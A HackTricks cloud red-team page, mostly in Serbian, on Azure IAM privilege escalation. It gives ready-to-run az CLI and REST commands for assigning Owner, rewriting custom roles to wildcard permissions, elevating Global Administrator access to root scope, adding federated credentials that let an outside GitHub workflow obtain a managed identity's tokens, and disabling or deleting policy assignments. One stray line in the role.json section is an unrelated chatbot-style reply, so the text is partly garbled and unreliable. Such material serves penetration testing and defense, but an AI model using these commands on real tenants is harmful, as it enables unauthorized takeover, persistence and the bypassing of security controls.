Az - Azure IAM Privesc (Authorization)

Tip

Nauči & vežbaj AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Nauči & vežbaj GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Nauči & vežbaj Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks

Azure IAM

Za više informacija proveri:

Az - Entra ID (AzureAD) & Azure IAM

Dozvole koje omogućavaju principal-u da menja samu authorization su obično privesc primitive. Ovo je posebno opasno kada su dodeljene na management group ili subscription scope-ove, jer se dozvole nasleđuju od strane child resources.

Microsoft.Authorization/roleAssignments/write

Ova dozvola omogućava kreiranje role assignments nad određenim scope-om, što napadaču omogućava da eskalira privilegije dodeljivanjem sebi ili nekom drugom kontrolisanom principal-u više privilegovan role.

Tipičan tok:

# Login and confirm current context
az login
az account show

# Enumerate current assignments and find the custom role granting this action
az role assignment list --all --output table
az role definition list --name "<role-definition-name>"

Ako kompromitovani principal ima ovu akciju nad scope-om, može direktno da dodeli privilegovanu ulogu kao što su Owner, Contributor, Key Vault Secrets Officer, ili bilo koju drugu built-in/custom ulogu dostupnu u tom scope-u:

# Example
az role assignment create --role Owner --assignee "24efe8cf-c59e-45c2-a5c7-c7e552a07170" --scope "/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.KeyVault/vaults/testing-1231234"

Znajući principal object ID ciljnog user/service principal/managed identity je dovoljno da se dodeli nova rola. Ovo može da se zloupotrebi za self-privesc, lateral movement, ili persistence tako što se rola dodeli drugom kontrolisanom principal-u.

Microsoft.Authorization/roleDefinitions/write

Ova permission omogućava kreiranje ili modifikovanje custom role definitions. U praksi, ovo je opasno zato što napadač može:

  • Modifikovati custom role koja je već dodeljena kompromitovanom principal-u, čime nove permissions odmah postaju aktivne.
  • Kreirati novu over-privileged custom role i zatim je dodeliti, obično uz chaining sa Microsoft.Authorization/roleAssignments/write.

Typical flow:

# Find the current assignments
az role assignment list --all --output table

# Review the role definition currently assigned to the compromised principal
az role definition list --name "<role-definition-name>"

Pošalji sadržaj koji želiš da ubacim u role.json, pa ću ga formatirati tačno kako treba.

{
"roleName": "<name of the role>",
"Name": "<name of the role>",
"IsCustom": true,
"Description": "Custom role with elevated privileges",
"Actions": ["*"],
"NotActions": [],
"DataActions": ["*"],
"NotDataActions": [],
"AssignableScopes": ["/subscriptions/<subscription-id>"],
"id": "/subscriptions/<subscription-id>/providers/Microsoft.Authorization/roleDefinitions/<role-id>"
}

Zatim ažuriraj permissions role-a sa prethodnom definicijom pozivajući:

az role definition update --role-definition role.json

Ako je modifikovana rola već dodeljena napadaču, ovo može biti brži put nego kreiranje nove role assignment jer se permission inflation primenjuje na postojeću dodelu.
Ako napadač ima samo roleDefinitions/write, i dalje može da je weaponize-uje tako što menja rola već dodeljene kompromitovanim principals.

Microsoft.Authorization/elevateAccess/action

This permissions allows to elevate privileges and be able to assign permissions to any principal to Azure resources. It’s meant to be given to Entra ID Global Administrators so they can also manage permissions over Azure resources.

Tip

Mislim da korisnik treba da bude Global Administrator u Entrad ID da bi elevate poziv radio.

# Call elevate
az rest --method POST --uri "https://management.azure.com/providers/Microsoft.Authorization/elevateAccess?api-version=2016-07-01"

# Grant a user the Owner role
az role assignment create --assignee "<obeject-id>" --role "Owner" --scope "/"

Microsoft.ManagedIdentity/userAssignedIdentities/federatedIdentityCredentials/write

Ovo permission omogućava kreiranje/azuriranje Federated Identity Credentials (FICs) na user-assigned managed identities. U praksi, ovo omogućava napadaču da doda novi trust relationship ka eksternom identity provider-u i zatim dobije tokene kao ta managed identity.

Ovo je persistence / identity hijacking primitive: ako managed identity već ima pristup Azure resursima, napadač treba samo da kreira odgovarajući eksterni workload (na primer, GitHub Actions workflow) i da zameni eksterni token za Azure tokene.

Korisne stavke za proveru pre zloupotrebe:

  • Koja managed identity može da se menja
  • Koji scope/roles su već dodeljeni toj managed identity
  • Koji issuer, subject i audience će biti prihvaćeni tokom token exchange

Možete kreirati FIC pomoću posebne CLI komande:

az identity federated-credential create \
--name "github-federated-identity" \
--identity-name testMI \
--resource-group bialystok-rg \
--issuer "https://token.actions.githubusercontent.com" \
--subject "repo:REPO/IAMTEST:ref:refs/heads/main" \
--audiences "api://AzureADTokenExchange"

Ili sa raw REST.

Primer komande za dodelu pristupa GitHub repo-u managed identity:

# Generic example:
az rest --method PUT \
--uri "https://management.azure.com//subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<managed-identity-name>/federatedIdentityCredentials/<name-new-federated-creds>?api-version=2023-01-31" \
--headers "Content-Type=application/json" \
--body '{"properties":{"issuer":"https://token.actions.githubusercontent.com","subject":"repo:<org-name>/<repo-name>:ref:refs/heads/<branch-name>","audiences":["api://AzureADTokenExchange"]}}'

# Example with specific data:
az rest --method PUT \
--uri "https://management.azure.com//subscriptions/92913047-10a6-2376-82a4-6f04b2d03798/resourceGroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/funcGithub-id-913c/federatedIdentityCredentials/CustomGH2?api-version=2023-01-31" \
--headers "Content-Type=application/json" \
--body '{"properties":{"issuer":"https://token.actions.githubusercontent.com","subject":"repo:carlospolop/azure_func4:ref:refs/heads/main","audiences":["api://AzureADTokenExchange"]}}'

Nakon što se FIC kreira, napadač može da se autentifikuje iz eksternog workload-a i koristi dozvole managed identity-ja koje su već dodeljene u Azure. Za više informacija o abusing GitHub OIDC / workload identity, pogledajte:

Az Federation Abuse

Microsoft.Authorization/policyAssignments/write | Microsoft.Authorization/policyAssignments/delete

Napadač sa dozvolom Microsoft.Authorization/policyAssignments/write ili Microsoft.Authorization/policyAssignments/delete nad management group, subscription ili resource group može da izmeni ili obriše Azure policy assignments, potencijalno onemogućavajući security restrictions koje blokiraju određene operacije.

Ovo omogućava pristup resursima ili funkcionalnostima koje su ranije bile zaštićene policy-jem.

Obriši policy assignment:

az policy assignment delete \
--name "<policyAssignmentName>" \
--scope "/providers/Microsoft.Management/managementGroups/<managementGroupId>"

Onemogući dodelu politike:

az policy assignment update \
--name "<policyAssignmentName>" \
--scope "/providers/Microsoft.Management/managementGroups/<managementGroupId>" \
--enforcement-mode Disabled

Proveri promene:

# List policy assignments
az policy assignment list \
--scope "/providers/Microsoft.Management/managementGroups/<managementGroupId>"

# Show specific policy assignment details
az policy assignment show \
--name "<policyAssignmentName>" \
--scope "/providers/Microsoft.Management/managementGroups/<managementGroupId>"

Microsoft.Authorization/policyDefinitions/write

Napadač sa dozvolom Microsoft.Authorization/policyDefinitions/write može da izmeni Azure policy definitions, menjajući pravila koja kontrolišu bezbednosna ograničenja širom okruženja.

Na primer, policy koja ograničava dozvoljene regione za kreiranje resursa može biti izmenjena tako da dozvoli bilo koji region, ili se policy effect može promeniti da postane neefikasna.

Izmeni policy definition:

az policy definition update \
--name "<policyDefinitionName>" \
--rules @updated-policy-rules.json

Verifikuj promene:

az policy definition list --output table

az policy definition show --name "<policyDefinitionName>"

Microsoft.Management/managementGroups/write

Napadač sa dozvolom Microsoft.Management/managementGroups/write može modifikovati hijerarhijsku strukturu management groups ili kreirati nove management groups, potencijalno zaobilazeći restriktivne politike primenjene na višim nivoima.

Na primer, napadač može da kreira novu management group bez restriktivnih politika i zatim premesti subscriptions u nju.

Kreiraj novu management group:

az account management-group create \
--name "yourMGname" \
--display-name "yourMGDisplayName"

Izmeni management group hierarchy:

az account management-group update \
--name "<managementGroupId>" \
--parent "/providers/Microsoft.Management/managementGroups/<parentGroupId>"

Verifikujte promene:

az account management-group list --output table

az account management-group show \
--name "<managementGroupId>" \
--expand

Microsoft.Management/managementGroups/subscriptions/write

Napadač sa permisijom Microsoft.Management/managementGroups/subscriptions/write može premestiti subscriptions između management groups, potencijalno zaobilazeći restrictive policies tako što premesti subscription u group sa manje restrictive ili bez policies.

Premesti subscription u drugi management group:

az account management-group subscription add \
--name "<managementGroupName>" \
--subscription "<subscriptionId>"

Potvrdite izmene:

az account management-group subscription show \
--name "<managementGroupId>" \
--subscription "<subscriptionId>"

References

Tip

Nauči & vežbaj AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Nauči & vežbaj GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Nauči & vežbaj Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks